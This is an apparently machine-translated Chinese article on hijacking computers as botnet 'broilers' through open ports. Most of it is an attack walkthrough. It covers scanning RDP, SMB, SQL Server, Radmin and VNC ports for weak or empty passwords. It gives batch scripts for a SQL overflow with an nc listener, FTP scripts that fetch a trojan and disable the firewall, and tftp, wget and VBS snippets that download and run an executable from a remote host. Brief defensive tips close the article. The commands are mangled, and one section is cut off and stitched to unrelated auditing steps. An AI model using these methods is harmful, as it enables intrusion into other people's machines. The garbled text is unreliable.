黑客如何通过端口攻击电脑，黑客端口入侵方式

黑客如何利用端口漏洞抓“肉鸡”？我们该如何防范？我在之前的文章中简单介绍过“肉鸡”这个词，为了方便广大同志的读者，我再详细解释一下小白明白了。 “肉鸡”也被称为傀儡机，机器可以理解为感染恶意软件并被恶意攻击者控制的一组计算机。它们可以被设计来执行非法或恶意任务，例如发送垃圾邮件、窃取数据、运行勒索软件、欺诈性广告点击和分布式拒绝服务(DDoS) 攻击。

1、黑客如何利用端口漏洞抓“肉鸡”？

1. 捕获3389只鸡

目前日本网上流传着XP的克隆版，但安装后默认开启一个新帐号、空密码的账户，而且3389基本开启，可以抓鸡了。首先，使用端口扫描工具扫描您的IP段上的3389端口。扫描完成后，使用远程桌面直接连接打开3389的机器（将结果保存为文本文件，并使用工具批量生成并连接3389连接），帐户回车创建新登录。如果别人电脑面前没有人，你可以去自己的空间下载并安装你上传的木马~~

此方法仅适用于XP系统。如果你遇到的是2000、2003、win7系统，就不要尝试了。

2、扫描135端口捕获肉鸡

首先，使用端口扫描仪扫描您的IP段上的135端口并保存结果。接下来使用NTSCAN过滤弱口令的机器，最后使用recton打开Telnet和hose。 135和445端口被防火墙屏蔽了，所以只能扫描你本地的135肉鸡。如果你想从其他地点捕获端口135肉鸡，则只能使用其他地点的135肉鸡进行扫描。

3、扫描445端口捕获肉鸡

这类似于扫描135抓鸡。首先使用端口扫描器扫描445端口是否有特定IP，然后保存结果，然后使用NTSCAN过滤弱口令的机器，最后使用AhD工具包，共享传输木马。 135和445端口被防火墙屏蔽了，所以只能扫描本地445肉鸡。如果您想从其他地方捕获端口，您可以仅使用外部445 肉鸡进行扫描。

4、1433端口批量溢出抓肉鸡

这种方法虽然可以实现全自动抓鸡，但目前做的人太多，成功率不高。使用工具： S scan sqlhello.exenc.exe 批处理文件首先创建一个批处理，打开记事本，复制以下代码，修改后保存为scan+overflow.bat文件。

@echooff

for/f\'eol=;tokens=1,2delims=\'%%iin(tt.txt)dos.exetcp%%i%%j

14331000/保存

@echooff

for/f\'eol=;tokens=1delims=\'%%iin(Result.txt)dosqlhello%%i

1433xxx.xxx.xx.xx556

您还需要创建一个新的tt.txt，其中包含要扫描的IP 段。格式为XXX。 %i1433xxx.xxx.xx.xx556 现在将您的IP 添加到XXX。 556是NC稍后要监听的端口。并编写一个批处理过程

@echooff

NC-l-vv-p556daima.txt

echo 用户名daima.txt

回显密码daima.txt

echobindaima.txt（以二进制格式发送数据）

echogetxxx.exe（木马文件名必须放在根目录下）daima.txt

回声.txt

netstopsharedaccess（关闭WINDOWS自带的防火墙）

ftp-s:daima.txt

xxx.exe（也输入木马文件名）

德尔迪玛.txt

注意不要删除上面代码中的回车符。如果不删除，将无法删除。

肉鸡上传文件的几种方式

tftp方法

首先，在自己的一台机器上搭建一个tftp服务器，比如运行tftpd32.exe。

接下来，将文件(sample.exe) 上传到另一台计算机(broiler)。

使用肉鸡命令运行：tftp -i server ipgetsample.exe

FTP方式

在肉鸡cmd中运行。

echoopenftp服务器ip[端口]ftp.txt

回显用户名ftp.txt

回显密码ftp.txt

echogetsample.exeftp.txt

echobyeftp.txt

ftp-s:ftp.txt

德尔夫特.txt

工具性方法

使用wineggdrop 的wget.exe

使用肉鸡命令运行：wget website/sample.exe

使用dl.vbe 方法

在肉鸡cmd中运行。

echowithwscript:if.arguments.count^2then.quit:endif

dl.vbe

echosetaso=.createobject(\'adodb.stream\'):set

web=createobject(\'microsoft.xmlhttp\')dl.vbe

echoweb.open\'get\',arguments(0),0:web.send:if

web.status^200thenquitdl.vbe

回声

aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile

.arguments(1),2:endwithdl.vbe

cscriptdl.vbehttp://*。 *。 *。 *:88/sample.exesample.exe

使用iget.vbe 方法

方法与4相同，但是

在肉鸡cmd中运行。

echoiLocal=LCase(WScript.Arguments(1))iget.vbe

echoiRemote=LCase(WScript.Arguments(0))iget.vbe

echoSetxPost=CreateObject(\'Microsoft.XMLHTTP\')

iget.vbe

echoxPost.Open\'GET\',iRemote,0iget.vbe

echoxPost.Send()iget.vbe

echoSetsGet=CreateObject(\'ADODB.Stream\')iget.vbe

echosGet.Mode=3iget.vbe

echosGet.Type=1iget.vbe

echosGet.Open()iget.vbe

echosGet.Write(xPost.responseBody)iget.vbe

echosGet.SaveToFileiLocal,2iget.vbe

cscriptiget.vbehttp://*。 *。 *。 */sample.exe 样本.exe

对HTTP 网站使用VBE 方法

echoSetxPost=CreateObject(\'Microsoft.XMLHTTP\')

dsa.vbe

echoxPost.Open\'GET\',\'http://*.*.*.*/sample.exe\',0

dsa.vbe

echoxPost.Send()dsa.vbe

echoSetsGet=CreateObject(\'ADODB.Stream\')dsa.vbe

echosGet.Mode=3dsa.vbe

echosGet.Type=1dsa.vbe

echosGet.Open()dsa.vbe

echosGet.Write(xPost.responseBody)dsa.vbe

echosGet.SaveToFile\'sample.exe\',2dsa.vbecscript

dsa.vbe

德尔德萨.vbe

3389 法律

您可以打开3389，登录并本地下载。这种方法对于服务器上传要求很高的机器特别有效。 （包括硬件防火墙）可以先打开多个NC.bat，然后打开Scan+Overflow.bat然后进入睡眠。自动扫描、扫描后自动溢出和溢出后自动关闭功能非常酷。现在，让我详细解释一下（笑）。 4221端口也可以通过这种方式溢出。对这些端口使用溢出工具。请注意，以上工具和批处理必须放在同一个文件中。

夹上它。

5、利用WINNTAuto Attack扫描SA弱口令，抓肉鸡

其实原理和上面是一样的，只是效率没有上面那么高。

工具：WINNTAuto AttackSQL综合利用工具

打开WINNTAuto Attack，找到您的IP，添加它，然后仅检查设置。

仅会发现PING 检查成功的计算机，并且SQL 将列出密码为空的SA。

扫描完成后，使用SQL综合工具连接并上传你的马。

去做就对了。

6、4899扫空密码抓鸡

工具： 端口扫描器4899 检测器Radmin

首先使用端口扫描器扫描4899 端口上的IP，然后使用4899 检测器在端口4899 上导入IP，然后扫描空密码，最后使用Radmin 扫描空密码。使用密码连接到您的机器并打开文件。管理和上传木马。运行起来是没有问题的。

8.扫描5900端口捕获VNC肉鸡

工具：VNC扫描仪VNC连接器

首先，使用VNC 扫描仪扫描IP 段。扫描格式为vscan.exe（扫描仪文件名）-i219.0.0.0-219.255.255.255（IP段扫描）-p5900-vnc-vv。完成后，它将在扫描仪位置创建。将在同一文件夹中生成一个文本文件。打开后，您将看到IP 列表。 IP 之后，您会看到“已修补”、“禁止”和“易受攻击”等字样。我唯一能想到的词是“脆弱”。

3.如何防止我的电脑被当成“肉鸡”？

通常方法：

1. 创建安全密码

许多人的设备都有默认的用户名和密码，或者非常简单的密码，很容易被犯罪分子破解。因此，创建复杂且安全的密码是非常有必要的，但是非常安全的密码使得暴力破解变得非常困难。

2.定期进行系统清理和恢复

创建定期系统备份。如果您的计算机遇到问题，您可以直接将计算机恢复到最后的安全状态并清理垃圾软件，包括僵尸网络软件。

3.安装必要的安全防护和杀毒软件

当今的防病毒软件越来越强大且免费。只要您在使用计算机时不访问不道德的网站或软件，防病毒软件就可以确保您的计算机安全。

如今，“肉鸡”不仅仅是电脑，任何能连接互联网的设备都可以成为“肉鸡”。如果你的电脑成了“肉鸡”，首先用杀毒软件检查病毒或者重装系统。如果您的物联网设备变成了“肉鸡”，您可以将其恢复出厂设置或使用其他方法格式化设备。如果这些选项不可行，您的设备制造商或系统管理员可能会提供其他解决方法。

专业方法：

1.屏幕保护

在Windows 中启用屏幕保护程序后，只要您在预设时间内让计算机无人看管（或不与其交互），系统就会自动启动屏幕保护程序并阻止您移动鼠标或敲击键盘.然后系统会自动启动屏幕保护程序。当系统恢复正常运行状态时，会打开密码确认框。输入正确的密码后才能返回系统。不知道密码的用户无法进入操作状态，保护了系统的安全。数据。提示：一些设计不佳的屏幕保护程序不会阻止系统Ctrl+Alt+Del 组合键，因此安装后测试您的程序，看看它是否存在此严重错误。您需要检查。然而，屏幕保护程序使用最快的时间是用户离开后一分钟自动启动时。你是否必须坐在电脑旁等待N分钟屏幕保护程序启动才能离开？其实，你只需打开以下系统子目录即可：进入Windows安装目录，找到对应的屏幕保护程序（扩展命名SCR），按住鼠标右键，将其拖至桌面，在弹出的菜单中选择“在当前位置创建快捷方式”命令。在桌面上创建这些屏幕保护程序的快捷方式。然后，您可以双击该快捷方式，以便在离开计算机时立即启动屏幕保护程序。

2.巧妙隐藏你的硬盘

3) 右键单击要审核的文件或文件夹，从弹出菜单中选择“属性”命令，然后在弹出窗口中选择“安全”选项卡。

4) 单击“高级”按钮并选择“审核”选项卡。

5) 根据您的具体情况选择操作。如果要为新组或用户设置审核，请单击“添加”按钮，在“名称”框中键入新用户名，然后单击“确定”。单击\ 按钮打开“审核项目”对话框。要查看或修改原始组或用户审核，请选择用户名并单击查看/编辑按钮。要删除原始组或用户审核，请选择用户名并单击“删除”按钮。

6) 或者，在“项目审核”对话框的“应用于”列表中选择要检查的位置。

7) 如果您不希望目录树中的文件和子文件夹继承这些审核项目，请选中仅将这些审核项目应用于此容器内的对象和/或容器复选框。注意：必须是管理员组成员或已在组策略中被授予“管理审核和安全日志”权限的用户才能审核文件或文件夹。在Windows XP 中审核文件和文件夹之前，必须在组策略的审核策略中启用审核对象访问。否则，您在设置文件和文件夹审核时将收到错误消息，并且文件和文件夹将不会被审核。